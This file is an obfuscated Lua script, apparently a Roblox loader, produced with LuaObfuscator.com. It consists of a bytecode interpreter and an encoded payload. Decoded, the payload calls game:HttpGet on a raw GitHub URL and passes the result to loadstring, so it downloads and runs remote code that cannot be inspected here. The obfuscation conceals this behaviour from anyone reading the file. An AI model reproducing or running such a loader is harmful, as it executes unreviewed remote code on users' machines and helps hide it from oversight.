--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=0;local v19;local v20;local v21;local v22;local v23;local v24;local v25;local v26;local v27;local v28;local v29;local v30;while true do if (1==v18) then v21=nil;function v21(v31,v32,v33) if v33 then local v69=(877 -(282 + 595)) -0 ;local v70;while true do if (v69==0) then v70=(v31/(2^(v32-(2 -1))))%((3 -1)^(((v33-1) -(v32-(2 -1))) + (620 -(555 + (1701 -(1523 + 114)))))) ;return v70-(v70%(932 -(857 + 74))) ;end end else local v71=0;local v72;while true do if (v71==(568 -(367 + 201))) then v72=(2 + 0)^(v32-(928 -(214 + 713))) ;return (((v31%(v72 + v72))>=v72) and (1 + 0)) or (0 + 0) ;end end end end v22=nil;v18=2;end if (7==v18) then function v30(v34,v35,v36) local v37=0;local v38;local v39;local v40;while true do if (1==v37) then v40=v34[3];return function(...) local v80=v38;local v81=v39;local v82=v40;local v83=v28;local v84=1;local v85= -1;local v86={};local v87={...};local v88=v12("#",...) -1 ;local v89={};local v90={};for v96=0,v88 do if (v96>=v82) then v86[v96-v82 ]=v87[v96 + 1 ];else v90[v96]=v87[v96 + 1 ];end end local v91=(v88-v82) + 1 ;local v92;local v93;while true do v92=v80[v84];v93=v92[1];if (v93<=3) then if (v93<=1) then if (v93>0) then local v106=v92[2];v90[v106]=v90[v106](v13(v90,v106 + 1 ,v85));else local v108=v92[2];local v109,v110=v83(v90[v108](v13(v90,v108 + 1 ,v92[3])));v85=(v110 + v108) -1 ;local v111=0;for v125=v108,v85 do local v126=0;while true do if (v126==0) then v111=v111 + 1 ;v90[v125]=v109[v111];break;end end end end elseif (v93>2) then v90[v92[2]]=v92[3];else local v114=0;local v115;local v116;while true do if (v114==0) then v115=v92[2];v116=v90[v92[3]];v114=1;end if (v114==1) then v90[v115 + 1 ]=v116;v90[v115]=v116[v92[4]];break;end end end elseif (v93<=5) then if (v93==4) then v90[v92[2]]=v36[v92[3]];else do return;end end elseif (v93>6) then v90[v92[2]]();else local v119=0;local v120;local v121;local v122;local v123;local v124;while true do if (v119==6) then v90[v92[2]]();v84=v84 + 1 ;v92=v80[v84];do return;end break;end if (v119==0) then v120=nil;v121,v122=nil;v123=nil;v124=nil;v90[v92[2]]=v36[v92[3]];v119=1;end if (v119==2) then v124=v92[2];v123=v90[v92[3]];v90[v124 + 1 ]=v123;v90[v124]=v123[v92[4]];v84=v84 + 1 ;v119=3;end if (v119==3) then v92=v80[v84];v90[v92[2]]=v92[3];v84=v84 + 1 ;v92=v80[v84];v124=v92[2];v119=4;end if (5==v119) then v92=v80[v84];v124=v92[2];v90[v124]=v90[v124](v13(v90,v124 + 1 ,v85));v84=v84 + 1 ;v92=v80[v84];v119=6;end if (v119==1) then v84=v84 + 1 ;v92=v80[v84];v90[v92[2]]=v36[v92[3]];v84=v84 + 1 ;v92=v80[v84];v119=2;end if (4==v119) then v121,v122=v83(v90[v124](v13(v90,v124 + 1 ,v92[3])));v85=(v122 + v124) -1 ;v120=0;for v155=v124,v85 do v120=v120 + 1 ;v90[v155]=v121[v120];end v84=v84 + 1 ;v119=5;end end end v84=v84 + 1 ;end end;end if (v37==0) then v38=v34[1];v39=v34[2];v37=1;end end end return v30(v29(),{},v17)(...);end if (v18==5) then v27=v24;v28=nil;function v28(...) return {...},v12("#",...);end v18=6;end if (v18==4) then function v25() local v41=0 + 0 + 0 ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(998 -(915 + 82))) then v44=1 -0 ;v45=(v21(v43,1066 -(68 + 997) ,20) * (((774 -(201 + 571)) + 0)^(1302 -(226 + (2182 -(116 + 1022)))))) + v42 ;v41=8 -6 ;end if (v41==(1187 -(1069 + 118))) then v42=v24();v43=v24();v41=118 -(32 + 85) ;end if (v41==(2 + (0 -0))) then v46=v21(v43,4 + 17 ,7 + 24 );v47=((v21(v43,989 -(892 + 65) )==(2 -1)) and  -(1 -0)) or (1 -(0 + 0)) ;v41=21 -(10 + 8) ;end if (v41==3) then if (v46==(350 -(87 + 263))) then if (v45==(442 -(416 + 26))) then return v47 * (180 -(67 + 113)) ;else v46=3 -2 ;v44=0 + 0 ;end elseif (v46==(5025 -2978)) then return ((v45==(0 + 0)) and (v47 * ((3 -2)/(952 -(802 + 150))))) or (v47 * NaN) ;end return v8(v47,v46-(1453 -((160 -116) + 386)) ) * (v44 + (v45/(((17 -12) -3)^(93 -41)))) ;end end end v26=nil;function v26(v48) local v49;if  not v48 then local v73=0 + 0 ;while true do if (v73==0) then v48=v24();if (v48==(859 -(814 + 45))) then return "";end break;end end end v49=v3(v16,v19,(v19 + v48) -(2 -1) );v19=v19 + v48 ;local v50={};for v67=(886 -(261 + 624)) + 0 , #v49 do v50[v67]=v2(v1(v3(v49,v67,v67)));end return v6(v50);end v18=5;end if (v18==6) then v29=nil;function v29() local v51=0 + 0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;while true do if (v51==(702 -(271 + 429))) then v56=nil;v57=nil;v51=3;end if ((1 + 0)~=v51) then else v54=nil;v55=nil;v51=1502 -(1408 + 92) ;end if (v51~=(1086 -(461 + 625))) then else v52=1288 -(993 + 295) ;v53=nil;v51=1 + 0 ;end if ((1174 -(418 + 753))==v51) then v58=nil;while true do local v94=0 + 0 ;local v95;while true do if (v94==0) then v95=0 + 0 ;while true do if ((0 + 0)==v95) then local v105=0;while true do if (v105==1) then v95=1 + 0 ;break;end if (v105~=(529 -(406 + 123))) then else if (v52==1) then local v158=1769 -(1749 + 20) ;while true do if (v158==0) then v56={v53,v54,nil,v55};v57=v24();v158=1;end if (v158==1) then v58={};v52=2;break;end end end if (v52~=0) then else v53={};v54={};v55={};v52=2 -1 ;end v105=1;end end end if (v95==1) then if (v52==3) then local v127=0;while true do if (0==v127) then for v159=2 -1 ,v24() do v54[v159-1 ]=v29();end return v56;end end end if (v52~=2) then else local v128=1900 -(106 + 1794) ;local v129;while true do if (v128~=0) then else v129=0;while true do if (v129==1) then for v162=1,v24() do local v163=0;local v164;local v165;while true do if (v163~=(0 + 0)) then else local v173=0 + 0 ;while true do if (v173==(0 -0)) then v164=0;v165=nil;v173=2 -1 ;end if (v173~=(115 -(4 + 110))) then else v163=585 -(57 + 527) ;break;end end end if (v163~=1) then else while true do if (v164==(1427 -(41 + 1386))) then v165=v22();if (v21(v165,104 -(17 + 86) ,1 + 0 )==0) then local v176=0;local v177;local v178;local v179;local v180;local v181;local v182;while true do if (v176~=(1 -0)) then else v179=nil;v180=nil;v176=2;end if (v176~=0) then else v177=0;v178=nil;v176=2 -1 ;end if (v176~=(168 -(122 + 44))) then else v181=nil;v182=nil;v176=5 -2 ;end if (v176==3) then while true do if (1~=v177) then else local v187=0;while true do if ((3 -2)~=v187) then else v177=2;break;end if (v187~=0) then else v180=nil;v181=nil;v187=1;end end end if (v177==0) then v178=0;v179=nil;v177=1;end if (2==v177) then v182=nil;while true do if (v178==2) then while true do if (v179~=(1 + 0)) then else local v192=0;local v193;while true do if (v192~=0) then else v193=0 + 0 ;while true do if ((1 -0)==v193) then v179=2;break;end if (v193~=0) then else local v203=65 -(30 + 35) ;while true do if ((1 + 0)~=v203) then else v193=1;break;end if (v203~=0) then else local v206=1257 -(1043 + 214) ;while true do if (v206==(0 -0)) then v182={v23(),v23(),nil,nil};if (v180==(320 -(53 + 267))) then local v212=0 + 0 ;local v213;while true do if (v212~=0) then else v213=0;while true do if (v213~=(413 -(15 + 398))) then else v182[3]=v23();v182[986 -(18 + 964) ]=v23();break;end end break;end end elseif (v180==(3 -2)) then v182[3]=v24();elseif (v180==(2 + 0)) then v182[3]=v24() -((2 + 0)^16) ;elseif (v180==(853 -(20 + 830))) then local v218=0 + 0 ;local v219;local v220;while true do if (v218==0) then v219=126 -(116 + 10) ;v220=nil;v218=1 + 0 ;end if (v218~=1) then else while true do if (v219~=0) then else v220=0;while true do if (v220==0) then v182[741 -(542 + 196) ]=v24() -((3 -1)^16) ;v182[4]=v23();break;end end break;end end break;end end end v206=1 + 0 ;end if (v206~=1) then else v203=1;break;end end end end end end break;end end end if (v179==(2 + 0)) then local v194=0;local v195;local v196;while true do if (v194~=(1 + 0)) then else while true do if (v195~=0) then else v196=0 -0 ;while true do if (v196==(2 -1)) then v179=1554 -(1126 + 425) ;break;end if (0~=v196) then else if (v21(v181,1,406 -(118 + 287) )==1) then v182[7 -5 ]=v58[v182[1123 -(118 + 1003) ]];end if (v21(v181,5 -3 ,2)~=(378 -(142 + 235))) then else v182[3]=v58[v182[13 -10 ]];end v196=1 + 0 ;end end break;end end break;end if (v194~=(977 -(553 + 424))) then else v195=0 -0 ;v196=nil;v194=1;end end end if (v179==3) then if (v21(v181,3,3)~=1) then else v182[4]=v58[v182[4 + 0 ]];end v53[v162]=v182;break;end if (v179~=0) then else local v198=0 + 0 ;local v199;while true do if ((0 + 0)~=v198) then else v199=0;while true do if (0~=v199) then else local v204=0;local v205;while true do if (v204~=(0 + 0)) then else v205=0;while true do if (v205==1) then v199=1;break;end if (v205~=(0 + 0)) then else local v211=0;while true do if ((0 -0)==v211) then v180=v21(v165,5 -3 ,6 -3 );v181=v21(v165,4,2 + 4 );v211=1;end if (1~=v211) then else v205=1;break;end end end end break;end end end if (v199~=1) then else v179=4 -3 ;break;end end break;end end end end break;end if (0~=v178) then else local v188=753 -(239 + 514) ;local v189;while true do if (v188~=0) then else v189=0 + 0 ;while true do if (v189==1) then v178=1330 -(797 + 532) ;break;end if (v189~=0) then else local v202=0 + 0 ;while true do if ((0 + 0)~=v202) then else v179=0;v180=nil;v202=1;end if (v202~=1) then else v189=2 -1 ;break;end end end end break;end end end if (v178==(1203 -(373 + 829))) then local v190=731 -(476 + 255) ;while true do if (v190~=1) then else v178=1132 -(369 + 761) ;break;end if (v190==0) then v181=nil;v182=nil;v190=1 + 0 ;end end end end break;end end break;end end end break;end end break;end end end v52=5 -2 ;break;end if ((0 -0)==v129) then for v166=239 -(64 + 174) ,v57 do local v167=0;local v168;local v169;local v170;local v171;local v172;while true do if (0~=v167) then else v168=0 + 0 ;v169=nil;v167=1 -0 ;end if (v167~=2) then else v172=nil;while true do if (v168~=(338 -(144 + 192))) then else while true do if ((216 -(42 + 174))~=v169) then else local v183=0;while true do if (v183==0) then v170=0 + 0 ;v171=nil;v183=1;end if (1==v183) then v169=1 + 0 ;break;end end end if (v169~=(1 + 0)) then else v172=nil;while true do if (v170==(1505 -(363 + 1141))) then if (v171==1) then v172=v22()~=(1580 -(1183 + 397)) ;elseif (v171==(5 -3)) then v172=v25();elseif (v171==(3 + 0)) then v172=v26();end v58[v166]=v172;break;end if (v170~=(0 + 0)) then else local v185=0;local v186;while true do if (v185~=(1975 -(1913 + 62))) then else v186=0;while true do if ((0 + 0)~=v186) then else local v191=0 -0 ;while true do if (v191==(1933 -(565 + 1368))) then v171=v22();v172=nil;v191=1;end if (v191==1) then v186=1;break;end end end if (v186~=(3 -2)) then else v170=1662 -(1477 + 184) ;break;end end break;end end end end break;end end break;end if (v168~=1) then else local v174=0 -0 ;while true do if (v174==(0 + 0)) then v171=nil;v172=nil;v174=1;end if (v174==1) then v168=2;break;end end end if (v168==0) then local v175=0;while true do if (v175==0) then v169=856 -(564 + 292) ;v170=nil;v175=1;end if (v175~=1) then else v168=1 -0 ;break;end end end end break;end if (v167~=(2 -1)) then else v170=nil;v171=nil;v167=306 -(244 + 60) ;end end end v56[3]=v22();v129=1 + 0 ;end end break;end end end break;end end break;end end end break;end end end v30=nil;v18=7;end if (v18==0) then v19=1;v20=nil;v16=v4(v3(v16,5),"..",function(v59) if (v1(v59,2)==79) then local v74=0;while true do if (v74==0) then v20=v0(v3(v59,1,1));return "";end end else local v75=0;local v76;while true do if (v75==0) then v76=v2(v0(v59,16));if v20 then local v103=0;local v104;while true do if (v103==1) then return v104;end if (v103==0) then v104=v5(v76,v20);v20=nil;v103=1;end end else return v76;end break;end end end end);v18=1;end if (v18==3) then v24=nil;function v24() local v60,v61,v62,v63=v1(v16,v19,v19 + 3 );v19=v19 + (480 -((1166 -(936 + 189)) + 435)) ;return (v63 * (16778217 -(938 + 63))) + (v62 * 65536) + (v61 * (197 + 59)) + v60 ;end v25=nil;v18=4;end if (v18==2) then function v22() local v64=v1(v16,v19,v19);v19=v19 + 1 ;return v64;end v23=nil;function v23() local v65,v66=v1(v16,v19,v19 + 1 + 1 );v19=v19 + (1615 -(1565 + 48)) ;return (v66 * (159 + 97)) + v65 ;end v18=3;end end end return v15("LOL!043O00030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574033C3O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F706F6B656C6F6B62722F7465737465732F6D61696E2F7961676F00083O0012063O00013O00122O000100023O00202O00010001000300122O000300046O000100039O0000026O000100016O00017O00",v9(),...);
